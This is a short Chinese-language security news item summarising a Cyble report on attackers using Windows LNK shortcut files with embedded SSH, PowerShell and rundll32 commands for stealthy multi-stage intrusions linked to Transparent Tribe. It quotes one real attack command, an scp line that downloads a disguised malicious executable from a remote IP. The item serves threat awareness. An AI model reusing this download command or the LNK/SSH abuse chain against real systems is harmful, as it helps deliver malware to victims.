【安全资讯】LNK文件与SSH命令：先进网络攻击的新武器

概要：

近期，Cyble Research and Intelligence Labs（CRIL）发布了一份报告，揭示了网络攻击者越来越多地利用LNK文件和SSH命令作为隐蔽工具，策划先进的网络攻击。这些技术使攻击者能够绕过传统安全措施，保持持久性，并执行多阶段攻击链，影响全球系统。

主要内容：

LNK文件，通常被称为Windows快捷方式文件，已成为攻击者首选的初始感染载体。报告指出，这些恶意快捷方式文件常常伪装成合法文档，成为攻击者入侵系统的首要途径。通过嵌入利用Living-off-the-Land Binaries（LOLBins）如PowerShell和rundll32的命令，攻击者能够在不被检测的情况下执行额外的有效载荷。

更复杂的是，近期的攻击活动在恶意LNK文件中嵌入了SSH命令。这些命令支持多种恶意活动，包括数据外泄、远程有效载荷执行和持久性。CRIL观察到，攻击者使用安全复制协议（SCP）下载并执行恶意文件。例如，一项活动使用了如下SSH命令：scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\，该命令将伪装成合法应用程序的恶意可执行文件下载到目标系统。

报告强调了SSH命令的多种滥用方式，包括通过ProxyCommand调用PowerShell执行恶意脚本，以及利用rundll32加载恶意DLL。高级持续威胁（APT）组织已将这些技术纳入其攻击手册，针对高价值行业进行攻击。CRIL发现近期活动与以往归因于APT组织Transparent Tribe的攻击存在相似之处，该组织以针对国防和航空航天行业而闻名。这些技术的使用标志着网络攻击方法论的范式转变，攻击者不断完善其方法，以利用受信任的系统工具来规避检测。